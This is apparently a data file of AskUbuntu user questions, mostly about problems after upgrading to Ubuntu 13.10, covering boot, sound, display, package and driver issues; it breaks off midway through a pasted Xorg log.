360615	ubuntu server 13.10 now goes to sleep when closing laptop lid	i recently upgraded to the latest version ( 13.10 ) . i have it running on an old laptop . since the upgrade , whenever i close the laptop lid , it goes to sleep mode . any idea on how to fix ? i 've tried the solution here : keep ubuntu server running on a laptop with the lid closed ? after installing acpi-support i do n't have the file : /etc/acpi/event/lidbtn to edit . your help is appreciated !
360616	why was wubi removed from 13.04+	since 13.04 , there is no wubi , why was wubi removed from the installation phase ?
360619	installed ubuntu bootloader on wrong device , now ca n't start windows	i have a configuration with two hard drives , on the first hd , there are two partitions , on first of those is windows 7 installed . i tried to install ubuntu on second hd , however , i accidentally set the bootloader to install on sda instead of sdb . now , i can no longer boot up windows , and when selecting the devices to boot up from , the first hd does n't even show up . i tried boot-repair but it did n't help . here are more details : http : //paste.ubuntu.com/6253962/ thanks in advance ...
360621	major problems with setrlimit after upgrading to saucy	i have been using setrlimit with the r programming language for several versions of ubuntu . however after upgrading to 13.10 , very strange things started happening . first i started noticing that apache2 was hitting rlimit_nproc which was set to 50 , even though apache actually only seemed to have a couple of processes . see more detail in this thread . i assumed it was a problem related to the upgrade of apache 2.2 to apache 2.4 . however now i am also experiencing strange things with rlimit_as . in my application i set rlimit_as to 1e9 ( 1gb ) for each process , which should be more than enough . however i am randomly getting out of memory errors . has something changed between kernel 3.8 and 3.11 in the way setrlimit works ?
360622	how to activate subpixel font hinting for the text inside firefox , chrome and evince ?	i used the answers to this question to tune the subpixel font hinting in the unity interface . however , the text rendered inside firefox , chrome or evince does n't use subpixel anti-aliasing . sadly these three applications are the one which need it the most . subpixel font hinting is enabled almost everywhere else . how to activate it for these applications ?
360626	how to interpret ubuntu 's on/off toggle buttons ?	i have the same question as another poster and his question was n't answered . it seemed like the people giving help did n't understand the question , so here we go again . the original poster 's question is below . what does the off on an on/off toggle switch mean ? is it saying the function is off , or is it saying if you click it , it will turn off ? i find it confusing . i do n't care about why anybody designed it that way , i just want the answer to the simple question above . i am that dumb i have to ask the question . how to interpret gnome 's on/off toggle buttons ?
360629	applied external hdd permssions do n't stay permanent	i 've added permissions to an external usd hdd to allow users to access the drive over a wifi network . i was having an issue with giving permissions for other users to access the drive . i solved it via this thread ( sharing between ubuntu and mac - argh , help ! ) . in short , i made a mountpoint and assigned with the drive to the mountpoint using the following terminal command `` sudo mount -t vfat -o users , umask=0000 /dev/sdb3 /media/mydrivesnewhome '' . this works great but when i restart the machine or unmount the drive , ubuntu creates and reassigns the external drive to a new mountpoint [ mountpoint1 ] . any suggestions on why this is happening and how i can make it permanent ?
360634	what is the upgrade manager ?	what exactly is the role of the upgrade manager ? i 've noticed that the last few releases of ubuntu downloads an upgrade manager once you press the upgrade button . i thought the upgrade was merely handled by apt ?
360637	no sound ubuntu 12.04 lts	toshiba satellite ld355 s7817 intel 82801h . have low volume earphone , no sound from external speakers . https : //wiki.ubuntu.com/audio/upgradingalsa says sometimes upgrading sound drivers will help you fix an issue with your sound . there are several ways to upgrade your alsa sound drivers . first , some words of caution : warning / ! \ make sure you only have one override of alsa drivers installed at a time . make sure you uninstall the previous override before trying a new one , otherwise it is unclear which version will take precedence . how to `` have one override '' , and how to `` uninstall previous override '' ? i 'd like to take these precautions before i ( a newbie ) installs per this ask.ubuntu website . apparently , my alsa drivers outdated . thnx ! .
360638	decompression program with support for special symbols ? ( japanese )	i 've recently gotten utau on ubuntu ( through wine / playonlinux ) and i 've tried installing some voicebanks . i know that the default ubuntu archive manager does not handle japanese , and the tutorial i was using suggested using the unzip command in the terminal , which also did not work . i was wondering if there is some archive manager that support japanese ? i do have ubuntu 's japanese language pack installed ( which i needed to install utau in the first place ) so um ... yeah . any ideas or programs out there ?
360639	what is the replacement for assogiate ?	during the update to saucy , the assogiate module is removed as it has been declared obsolete . i can find no replacement for the editor of the mime file types database which is compatible with ubuntu 13.10 . can anyone point me towards the replacement module ?
360641	upgrading ubuntu 13.04 to 13.10 - issues	i am having trouble upgrading from ubuntu 13.04 to 13.10 . i see this message appear during installation : how would one go about fixing this issue ?
360643	booting system without full network configuration , how to reverse ?	hi i am running ubuntu 12.04 lts and i have not been able to connect to the internet through a cable from the satellite . so i found the following advice : start the terminal and type gksu gedit /etc/network/interfaces file will opened in gedit . it will be empty or should contain auto lo iface lo inet loopback in gedit add following lines and save it and close auto eth0 iface eth0 inet dhcp and restart the network manager it works fine with my case so i followed it and now ubuntu says `` waiting for network configuration '' , followed by `` booting system without full network configuration '' . it takes a few minutes to start the computer now . it also got rid of the little connection icon that normally lets me know if networks are in range or if a wire is plugged in . my question is how do i reverse this ? and is there a way to be able to connect to the internet through the wire . your help would be greatly appreciated . i am completely new to this and it was my first attempt at using the terminal and it back fired ; ) thank you so much , sandra
360645	intel gma x3100 external monitor resolution issue	i 'm running ubuntu 12.04 on a macbook 4,1 ( intel gma x3100 graphics chipset ) on an external monitor , but can only get a resolution of 1024 x 768 ( i get 1280 x 1024 in os x ) . i 'm able to force the resolution to 1280 x 1024 using the xrandr command as per these instructions , but there are two issues now : the screen is off center , by maybe a couple dozen pixels up and to the left . the instructions are for 10.04 , and the directions for making the change permanent do not work in 12.04 . any way to fix this ? update : i believe the driver is the root of the problem . ubuntu listed the graphics device as `` unknown '' until i installed mesa-utils . i also get a message on boot before the desktop loads that says something along the lines of 00:02.0 : i915 invalid rom contents . here is the relevant output of lspci -v : 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : apple inc. device 00a1 flags : bus master , fast devsel , latency 0 , irq 45 memory at d0100000 ( 64-bit , non-prefetchable ) [ size=1m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 6110 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : intelfb , i915 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 03 ) subsystem : apple inc. device 00a1 flags : fast devsel memory at d0200000 ( 64-bit , non-prefetchable ) [ disabled ] [ size=1m ] capabilities : < access denied > i tried using xrandr -- output vga1 -- pos 10x10 to see if it would reposition the screen but nothing happened .
360646	ca n't use php extension mcrypt in ubuntu 13.10 ( nginx , php-fpm )	i installed a fresh ubuntu 13.10 on my laptop . like i usually do , i install the packages i need for web development , which are nginx , php5-fpm , mysql , php5-mysql , php5-mcrypt and a few others . after editing some configuration files , this usually works . but today , since 13.10 , an error appears instead of the web page i expected . laravel requires the mcrypt php extension . the package php5-mcrypt has been installed and reinstalled . the command php -m does n't seem to show mcrypt . any idea where the problem could come from ? i 've done this setup many times and it always worked .
360648	problem : computer always `` crashes '' during startup , after wubi install , kubuntu	i installed ubuntu a while ago , alongside windows 7 . one time , while updating ubuntu , my computer turned off ( my charger was not properly connected ) . this must have happened at an unfortunate moment in the update process , as afterwards i could no longer start ubuntu . i recently tried reinstalling using wubi again , only this time i wanted to try the various other flavours , starting with kubuntu . however , as the kubuntu-install process was starting and the logo appeared with five dots underneath , something happened . the screen suddenly froze in a glitch-like picture , before the mouse-arrow appeared on top of it . the mouse-arrow responded to input , but there was n't anything to click on the glitchy screen . i could dim and brighten the display , but pressing any other combinations of keys did n't have any effect . also , my computer started running incredibly warm , the fan blowing like crazy . do n't know how important that is , just an observation . what has happened ? this happens every time i try to boot into kubuntu . is there maybe some remnant of the broken ubuntu-install i had from before that is causing me problems ? anyone familiar with this error , or know a solution ? edit : i should mention that this error also happened to ubuntu when it broke . this is what is causing me to think the two problems are related .
360653	dependency is not satisfiable : lib32gcc1 in google chrome	i 've tried to install google chrome for 32-bit .deb package . but it gave me the following errors : depends : lib32gcc1 ( > = 1:4.1.1 ) but it is not installable depends : lib32stdc++6 ( > = 4.6 ) but it is not installable depends : libc6-i386 ( > = 2.11 ) but it is not installable depends : libxss1 but it is not installable currently , i 'm using ubuntu 13.10 ( 32-bit - i386 ) . so , when i try to install the dependency , it says me that i ca n't install . i 'm totally lost , i do n't know what should i do .
360659	attempt to read or write outside of disk hd0 problem	i installed ubuntu 13.04 on a 16gb usb memory ( full installation , not live usb ) and boot it with vmware player 6 + plop under windows 7 64-bit host . to avoid windows format complain , i created a fat32 partition at the beginning of the usb memory , with a second partition being ext and followed by a swap partition . the problem is , when i boot from the usb , it shows an error : attempt to read or write outside of disk hd0 . but it then allows me to boot in to ubuntu . once boot , everything seems to work as it should . but the error message before the boot bothers me a lot . i run fdisk command and got the following results : device boot start end blocks id system /dev/sda1 * 2048 3999743 1998848 b w95 fat32 /dev/sda2 4001790 30799871 13399041 5 extended /dev/sda5 4001792 28801023 12399616 83 linux /dev/sda6 28803072 30799871 998400 82 linux swap / solaris it seems that the system recognizes the fat32 partition as boot . i also tried to use boot-repair but the problem remains . would you mind giving me some advice on how to get rid of that error message at boot ? i can boot into ubuntu so this is not a big issue but i do not really want to see that error every time i boot from the usb . plus it seems to take a long time before the message is displayed , i think there might be a time out sort of thing for this error , which , as a result , slow my boot up time . thank you in advance for your help . lei
360661	ubuntu for old pc	ubuntu admins , please listen to me.. i have a proposal . ubuntu is a very , very good os . better than windows , but , my pc is very slower , why do not create a ubuntu for old pc 's ? would be a grand idea . good job guys . and thanks !
360663	weird system performance	i just freshly installed ubuntu 13.04 . my cpu seems to be going from 70 to 30 every 5 seconds or so . same for the wireless . weird stuff going on
360666	'gpio_ich failed to claim resource 0 '	when i boot up , i receive an error on the splash screen . gpio_ich : failed to claim resource 0 i started getting this right after i edited grub to fix this problem .
360669	ca n't use php extension solr in ubuntu 13.10 ( apache )	after i upgraded to ubuntu 13.10 , the local development version of my website stopped working with a php warning : include ( solrquery.php ) : failed to open stream : no such file or directory i checked the pecl solr extension is installed : > sudo pecl install solr pecl/solr is already installed and is the same as the released version 1.0.2 i checked the solr apache extension is set up : > cat /etc/php5/apache2/conf.d/solr.ini extension=solr.so any idea where the problem could be ? the command php -m does n't seem to show solr .
360670	how long does it generally take for for ubuntu touch to boot after installation ?	i followed the instructions from here : enter link description here to install ubuntu touch manually on my nexus 4 . however the device will not boot past the google screen ( up to 10 minutes ) . is this normal ? p.s . i am using a mac and flashed files using terminal and fastboot/adb commands . thx , gavin
360672	how to install ubuntu touch with a windows computer ?	can i install ubuntu touch on my phone via a windows 8 laptop ? i think i 'm only seeing instructions from a unix-ish environment ?
360673	upgrading ubuntu from 12.04 to 12.10 broke my system , completely .	first , i hope that this is not a duplicate , because i found my question quite strange and unique , and i do n't have any idea with it . these days i heard of the new ubuntu release , version 13.10 and i am quite excited . i have been stuck in 12.04 for such a long time and it 's time for a good upgrade . so ... i ran update-manager -d and tried to go up to 12.10 . ( i decided to go up one by one ) it took a very long time to download all the required kernel and packages ... and soon installing ... and some questions asking me if i want to replace the old config files . i did some tweaking with that system before ( changing startup applications , tmpfs , zram-enabler , etc ) and i thought that it will cause a real crash if i keep these config files . so , i replaced all of them but it goes too slow and it 's time i 've to go to school . i asked my grandfather if he could help me to click all the 'replace ' buttons for me and shut down the computer after the upgrade finished . when i was back from school , he told me that he accidentally clicked 'keep ' for the last popup box , and my computer ca n't function now . the grub menu is still there ( made it appear by using the shift key trick ) , and the splash screen is still visible , and i hope that the login screen is still there , or at least the tty so that i can still do a rescue , but nothing worked . ctrl+alt+f1 does nothing , and i am sure that the monitor is still functioning . so what can i do now ?
360675	how to install ubuntu touch on nexus 4 using mac os x ?	will this work on a mac ? i want to install ubuntu touch on nexus 4 but i 'm pretty sure apt-get is n't compliant with the fruit shell . is it possible to install using mac os x ?
360676	how to upgrade from 13.10 beta to stable release ?	i installed 13.10 when it was either in beta/alpha , and now would like to upgrade to the official release . how should i go about this ? should i just make a new install disk and use that ? any help is much appreciated .
360677	a way to upgrade	5 along side win 7 . i have really bad internet , connected to a router and the connection dose not stay on for a decent 2 hours without resetting . is their a way to upgrade without having the updater re-update itself after every connection reset ? it would be cool if like torrent , it pause and resume on connection !
360678	update stopped in the midst . how do i restart	i was upgrading from 13.04 to 13.10 and the update stopped . i tried to restart , but , failed . i now have a system that is unusable . is there a way to recover ... ? ? the os is unbootable ... !
360682	how can i tell state of program seemingly running	i had firefox running , then ( possibly ) as a result of a key combination i do n't recall , it quickly vanished from screen and task bar/window list . ps ax | grep firefox returns the below+the unneeded grep firefox line ( both ps and the gui task manager , show firefox with seemingly unchanging rss , vm-size and 0 % cpu usage ) : johndoe 1916 36.6 14.0 923772 504372 tty1 sl 13:30 12:15 firefox *corrected* pstree | grep firefox returns : init─┬─2* [ rox-filer───firefox───25* [ { firefox } ] ] how can i tell what state the program is in ?
360683	grub fails after default 64bit install	i tried to install ubuntu to my laptop several times . there were a strange failure since 12.10 ( till 13.10 ) . i can not install 64bit ubuntu with only the 64bit . i have to install the 32bit one first . every time after the default install , grub fails to boot and complain missing i386-pc in my /boot folder . the failure message looks exactly like this on 13.10 installation . that is very strange since i 've got a 64bit compatible laptop ( lenovo b470 ) . my stupid solution would be to install the 32bit one first , then install the 64bit one without reformatting /boot partition . my laptop works just fine afterwards . in this case , either the installer or grub2 is having a problem . what do you think ? which package should i file my bug report with ? who is responsible to fix this ?
360684	ca n't install aircrack-ng for use wifite	i ca n't install aircrack-ng for use wifite vitor @ vitor-hp-g42-notebook-pc : ~ $ sudo apt-get install aircrack-ng [ sudo ] password for vitor : reading package lists ... done building dependency tree reading state information ... done package aircrack-ng is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : iw e : package 'aircrack-ng ' has no installation candidate '' the tutorial is http : //sejalivre.org/wifite-a-ferramenta-mais-facil-e-grafica-para-se-quebrar-senhas-de-redes-wireless/
360685	kernel not upgraded during a system upgrade	i upgraded my pc to ubuntu 13.10 and everything went well , however the kernel was not upgraded and i still have version 3.8 instead of the newer 3.11 . is it normal ? should i upgrade the kernel manually ?
360687	need to downgrade a package with many dependents	in order to get a working low-power video card setup i decided to use a custom xserver from andrikos : ppa . it worked well , but when the official release caught up to the bug fixes i dried to drop the ppa packages and there are some of them i can not get rid of . packages were from here : https : //launchpad.net/~andrikos/ i know how to down grade packages using synaptic ( force version ... ) and apt-get package=version . however , with some of the packages there are so many dependencies that is is no feasible to uninstall them all ( as synaptic wants to do ) . this is what i would like to do : sudo apt-get install -f libncurses5=5.9-10ubuntu4 libncursesw5=5.9-10ubuntu4 libncurses5 : i386=5.9-10ubuntu4 libncursesw5 : i386=5.9-10ubuntu4 libtinfo5=5.9-10ubuntu4 libtinfo5:386=5.9-10ubuntu4 but i get several hundreds of packages that have to be removed to meet the request . does anyone have any tips on removing the ppa packages ?
360688	i upgraded from 12.04 to 12.10 , but when i log in the screen is blank	i have upgraded my ubuntu to 12.10 , but when i log in the screen shows my background , asks me to unlock my keyring , and nothing else . the screen does not show the application bar or the bar at the top of the screen . i can move my mouse around , but not right click . i am only able to write this by booting through recovery mode . i am in a dire situation and need help soon . thank you .
360690	upgraded to 13.10 now clock settings are all disabled and clock does not display	i 've upgraded to 13.10 and now i do n't have the standard menu clock , which i need for work . i checked and 'indicator-datetime ' is installed . i even uninstalled/reinstalled that applet with no luck . also my `` clock '' settings under system preferences are all disabled . i ca n't change anything . does anyone know how i can get the old menu clock back ? alternatively is there another menu clock app i can download ? edit 1 thanks for the responses i 've restarted several times and that did n't fix the issue . i just ran the 13.10 update today . but i ran it again a few minutes ago . i got about 200kb in random updates . the issue is still present after a reboot . # apt-cache policy indicator-datetime indicator-datetime : installed : 13.10.0+13.10.20131016.2-0ubuntu1 candidate : 13.10.0+13.10.20131016.2-0ubuntu1 version table : *** 13.10.0+13.10.20131016.2-0ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages 100 /var/lib/dpkg/status edit 2 i believe the issue is related to 'rarings ' changing the systray somehow ... http : //www.omgubuntu.co.uk/2013/02/raring-retires-system-tray-whitelist or systray disappeared , although i have n't got that solution to work yet . edit 3 because of a suggestion from rolandixor i 've check the binaries . my system is missing 'libical.so.0 ' but it has 'libical.so.1 ' . ldd /usr/lib/x86_64-linux-gnu/indicator-datetime-service libical.so.0 = > not found does anyone know how to get the libical.so.0 binary that the datetime service needs but does n't install ?
360696	keyboard not working 100 % after ubuntu 13.10 upgrade	if this has already been asked , my apologies , i did not find it before writing this . so please do point me to the correct page . anyway , i have this weird issue on my laptop right now . the keyboard is not functioning 100 % . this means , i can type my login details to get into ubuntu . i can type something on dash . but other than this ( on the desktop ) , no output from the keyboard when using all the other apps - as in i start to type and nothing comes out . the surprising thing is that when i shift to guest session , the keyboard functions normally . when i shift to another tty , like alt+f5 , keyboard works normally . this is the first time i 've encountered this so far in my use of linux . keyboards normally never fail on any of the desktop environments i 've used over the years . any ideas what 's happening ? could be the config files on my home is too messy already . i 've upgraded this from 11.10 to 13.04 , then now 13.10 without a re-install . works fine so far , until now that i ca n't do much without a keyboard . thanks in advance ! p.s . mouse and touchpad works fine .
360697	headphones not working in 13.10 after update	i 'm still unable to get sound to my headphone jack on my ibm thinkpad t61 after a recent update to 13.10 . when i plug the headphones into the jack , there is sound for about 1 second and then it cuts out . the laptop speakers work fine . i 've tried editing analog-output.conf and analog-output-headphones.conf but have n't been successful . i 've also uninstalled/reinstalled pulseaudio and have tried using alsamixer . what am i doing wrong ? i 'm pulling my hair out !
360706	netflix desktop not working after update	netflix desktop was working fine until i upgraded to ubuntu 13.10 today . now , it gives me the message that the silverlight plugin has crashed . i tried different workarounds and to even downgrade my silverlight version to 4 -- apparently 5 does not work . i would appreciate help with this issue , and i 'm sure i 'm not the only one experiencing it .
360707	ubuntu 13.10 upgraded from 13.04 issues	the keyboard stopped working after a while , i started using 13.04 again via usb because i am waiting for the keyboard issues that 13.10 has to get an update . 13.04 had tons of issues i did n't care about because most of it worked . now almost none of it works . there 's even a huge amount of graphical errors . others have had these issues i 've noticed while looking at the similar questions area next to this text box , but my question is can i downgrade 13.10 to 13.04 ?
360708	free up /boot .. ca n't install new software	i was trying to install mixxx to see how well it would work with calf/other jack programs , but when it started installing it gave me an error saying out there was n't any free space on /boot looking at other 's questions on askubuntu and the ubuntu forums , i guess i 'm kind of confused , because i did n't see any that dealt with just software , not upgrades or kernel installations . i did uname -r 3.8.0-31 generic and then sudo dpkg -- list 'linux-image*' which gave back a few results , numbering from 3.8.0-19 through 3.8.0-31.46 maybe the other posts were just older in general , but other posts were saying to get rid of kernels like 2.6 and 2.8 , but not anything this recent . is it okay to delete all the kernels that are n't the 3.8.0-31 generic one ?
360710	command to check if a ppa supports specific version of ubuntu	i always script my installs after a new version get released . everything usually smooth until the ppa 's part . is there a quick command to check if a ppa would has a trunk for my current version ? there are workarounds like curling the page and grepping a version , but its not a clean fix .
360713	13.10 running from the dvd/ accessing the hdd	i 'm running ubuntu 13.10 off the disk image on a dvd-rw and i was wondering how do i or may i access the hard drive to take files off ?
360715	unity session broken after instaling 13.10	i just upgraded to 13.10 , and now my unity session is broken , i noticed it installed gnome session flashback during the upgrade , so i removed it thinking it may have conflicted with something else i 've installed , but that did n't fix it . i 've also installed the cinnamon desktop ( for nemo ) , and am currently using it since i ca n't use unity . at this rate i may have to reinstall ubuntu all together , but i 'd like to try fixing it without doing that . i 've already tried reinstalling ubuntu-desktop , unity , and compiz , as well as resetting all their configurations ( i used unity-tweak-tools unity reset ) .
360717	brightness problem after upgrade ubuntu 13.10	i have upgrade to 13.10 recently . but , the brightness is working after i add this in version 13.04 before . after i upgrade to 13.10 , this code is not working on asus slimbook x401u # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . echo 0 > /sys/class/backlight/acpi_video0/brightness exit 0
360718	lubuntu - sound card detected but no sound	i installed lubuntu 12.10 on my old laptop ( sharp mebius pc-mr80j ) , but sound does not work . here are things i tried . aplay -l does not output anything . when i run alsamixer , i see only one bar that says `` beep '' . i installed pavucontrol , pulseaudio , pulseaudio-utils and libgtk-3-0 and checked output devices , but i only see `` dummy ouput '' and there is no hardware output devices . cat /proc/asound/cards returns the following . 0 [ intel ] : hda-intel - hda intel hda intel at 0xfeb38000 irq 40 cat /proc/asound/devices outputs the following . 1 : : sequencer 2 : [ 0- 1 ] : hardware dependent 3 : [ 0- 0 ] : hardware dependent 4 : [ 0 ] : control 33 : : timer the laptop was running windows xp before and sound ( both input and outpu ) was working . what can i do now ?
360721	ubuntu 13.10 wo n't boot and hangs on a black screen	i installed ubuntu 13.10 64-bit today and i sat on the internet most of the day after installation . i shut the computer down and went bowling with my family . when i came back , i turned on my computer and it came to the boot screen as usual , but then the screen went black and stayed black . can this be solved or do i have to install ubuntu 13.04 . my dad does not know about this and i do not want to get yelled at for an hour , so i need an answer before midnight mountain time , otherwise i will install ubuntu 13.04 so i wo n't get yelled at in the morning .
360723	how to remove synaptic without installing all the unwanted packages ?	i am trying to uninstall synaptic . i prefer using apt-get and other command line tools to manage my packages . so i do not need synaptic and the software manager . i 'm trying to remove both of them using apt-get . its a new box . recently installed linux mint mate 15 . after installation , the only thing i did was , sudo apt-get update and sudo apt-get dist-upgrade after that , i did this command for removing synaptic , sudo apt-get remove -- purge synaptic but this gives me a very weird output , reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : apturl-kde icoutils kate-data katepart kde-runtime kde-runtime-data kdelibs-bin kdelibs5-data kdelibs5-plugins kdesudo kdoctools kubuntu-debug-installer libattica0.4 libdlrestrictions1 libkactivities-bin libkactivities-models1 libkactivities6 libkatepartinterfaces4 libkcmutils4 libkde3support4 libkdeclarative5 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 libkxmlrpcclient4 libnepomuk4 libnepomukcore4abi1 libnepomukquery4a libnepomukutils4 libntrack-qt4-1 libntrack0 libphonon4 libplasma3 libpolkit-qt-1-1 libpoppler-qt4-4 libqapt2 libqapt2-runtime libqca2 libqt4-qt3support libsolid4 libsoprano4 libstreamanalyzer0 libstreams0 libthreadweaver4 libvirtodbc0 nepomuk-core nepomuk-core-data ntrack-module-libnl-0 odbcinst odbcinst1debian2 oxygen-icon-theme phonon phonon-backend-gstreamer plasma-scriptengine-javascript qapt-batch shared-desktop-ontologies soprano-daemon virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : apturl-kde icoutils kate-data katepart kde-runtime kde-runtime-data kdelibs-bin kdelibs5-data kdelibs5-plugins kdesudo kdoctools kubuntu-debug-installer libattica0.4 libdlrestrictions1 libkactivities-bin libkactivities-models1 libkactivities6 libkatepartinterfaces4 libkcmutils4 libkde3support4 libkdeclarative5 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 libkxmlrpcclient4 libnepomuk4 libnepomukcore4abi1 libnepomukquery4a libnepomukutils4 libntrack-qt4-1 libntrack0 libphonon4 libplasma3 libpolkit-qt-1-1 libpoppler-qt4-4 libqapt2 libqapt2-runtime libqca2 libqt4-qt3support libsolid4 libsoprano4 libstreamanalyzer0 libstreams0 libthreadweaver4 libvirtodbc0 libxml2-utils nepomuk-core nepomuk-core-data ntrack-module-libnl-0 odbcinst odbcinst1debian2 oxygen-icon-theme phonon phonon-backend-gstreamer plasma-scriptengine-javascript qapt-batch shared-desktop-ontologies soprano-daemon virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common suggested packages : libterm-readline-gnu-perl libterm-readline-perl-perl djvulibre-bin finger hspell libqca2-plugin-cyrus-sasl libqca2-plugin-gnupg libqca2-plugin-ossl phonon-backend-vlc phonon-backend-xine phonon-backend-mplayer the following packages will be removed : aptoncd* apturl* mintupdate* mintwelcome* synaptic* the following new packages will be installed : apturl-kde icoutils kate-data katepart kde-runtime kde-runtime-data kdelibs-bin kdelibs5-data kdelibs5-plugins kdesudo kdoctools kubuntu-debug-installer libattica0.4 libdlrestrictions1 libkactivities-bin libkactivities-models1 libkactivities6 libkatepartinterfaces4 libkcmutils4 libkde3support4 libkdeclarative5 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 libkxmlrpcclient4 libnepomuk4 libnepomukcore4abi1 libnepomukquery4a libnepomukutils4 libntrack-qt4-1 libntrack0 libphonon4 libplasma3 libpolkit-qt-1-1 libpoppler-qt4-4 libqapt2 libqapt2-runtime libqca2 libqt4-qt3support libsolid4 libsoprano4 libstreamanalyzer0 libstreams0 libthreadweaver4 libvirtodbc0 libxml2-utils nepomuk-core nepomuk-core-data ntrack-module-libnl-0 odbcinst odbcinst1debian2 oxygen-icon-theme phonon phonon-backend-gstreamer plasma-scriptengine-javascript qapt-batch shared-desktop-ontologies soprano-daemon virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common 0 upgraded , 78 newly installed , 5 to remove and 0 not upgraded . need to get 60.9 mb of archives . after this operation , 146 mb of additional disk space will be used . do you want to continue [ y/n ] ? n abort . as you can see , apt-get is trying to install the same packages that it is asking me to autoremove . could someone please tell me , how to uninstall synaptic properly ? or am i missing something ? just for the record , i also did , sudo apt-get autoremove -- purge like it asked me to ... and this is what i got , reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 6 not upgraded .
360725	ca n't log in to gnome after upgrade ( raring - > saucy )	i 've just upgraded my ubuntu ( raring to saucy ) and i now ca n't log in to gnome . as opposed to virtual consoles ( ctrl-alt-f1 , for example ) . i set it up to log in automatically . but it asks for password now . i type in the password , press enter , the screen blinks and here i am again at the login screen . then i looked into /var/log/xorg.0.log : [ 33.956 ] initializing built-in extension dri2 [ 33.956 ] ( ii ) loadmodule : `` glx '' [ 33.956 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 33.956 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 33.956 ] compiled for 1.14.3 , module version = 1.0.0 [ 33.956 ] abi class : x.org server extension , version 7.0 [ 33.956 ] ( == ) aiglx enabled [ 33.956 ] loading extension glx [ 33.956 ] ( == ) matched fglrx as autoconfigured driver 0 [ 33.956 ] ( == ) matched ati as autoconfigured driver 1 [ 33.956 ] ( == ) matched fglrx as autoconfigured driver 2 [ 33.956 ] ( == ) matched ati as autoconfigured driver 3 [ 33.956 ] ( == ) matched vesa as autoconfigured driver 4 [ 33.956 ] ( == ) matched modesetting as autoconfigured driver 5 [ 33.956 ] ( == ) matched fbdev as autoconfigured driver 6 [ 33.956 ] ( == ) assigned the driver to the xf86configlayout [ 33.956 ] ( ii ) loadmodule : `` fglrx '' [ 33.957 ] ( ww ) warning , could n't open module fglrx [ 33.957 ] ( ii ) unloadmodule : `` fglrx '' [ 33.957 ] ( ii ) unloading fglrx [ 33.957 ] ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) [ 33.957 ] ( ii ) loadmodule : `` ati '' [ 33.957 ] ( ww ) warning , could n't open module ati [ 33.957 ] ( ii ) unloadmodule : `` ati '' [ 33.957 ] ( ii ) unloading ati [ 33.957 ] ( ee ) failed to load module `` ati '' ( module does not exist , 0 ) [ 33.957 ] ( ii ) loadmodule : `` vesa '' [ 33.957 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 33.957 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 33.957 ] compiled for 1.14.1 , module version = 2.3.2 [ 33.957 ] module class : x.org video driver [ 33.957 ] abi class : x.org video driver , version 14.1 [ 33.957 ] ( ii ) loadmodule : `` modesetting '' [ 33.957 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 33.957 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 33.957 ] compiled for 1.14.1 , module version = 0.8.0 [ 33.957 ] module class : x.org video driver [ 33.957 ] abi class : x.org video driver , version 14.1 [ 33.957 ] ( ii ) loadmodule : `` fbdev '' [ 33.957 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 33.958 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 33.958 ] compiled for 1.14.1 , module version = 0.4.3 [ 33.958 ] module class : x.org video driver [ 33.958 ] abi class : x.org video driver , version 14.1 [ 33.958 ] ( == ) matched fglrx as autoconfigured driver 0 [ 33.958 ] ( == ) matched ati as autoconfigured driver 1 [ 33.958 ] ( == ) matched fglrx as autoconfigured driver 2 [ 33.958 ] ( == ) matched ati as autoconfigured driver 3 [ 33.958 ] ( == ) matched vesa as autoconfigured driver 4 [ 33.958 ] ( == ) matched modesetting as autoconfigured driver 5 [ 33.958 ] ( == ) matched fbdev as autoconfigured driver 6 [ 33.958 ] ( == ) assigned the driver to the xf86configlayout [ 33.958 ] ( ii ) loadmodule : `` fglrx '' [ 33.958 ] ( ww ) warning , could n't open module fglrx [ 33.958 ] ( ii ) unloadmodule : `` fglrx '' [ 33.958 ] ( ii ) unloading fglrx [ 33.958 ] ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) [ 33.958 ] ( ii ) loadmodule : `` ati '' [ 33.958 ] ( ww ) warning , could n't open module ati [ 33.958 ] ( ii ) unloadmodule : `` ati '' [ 33.958 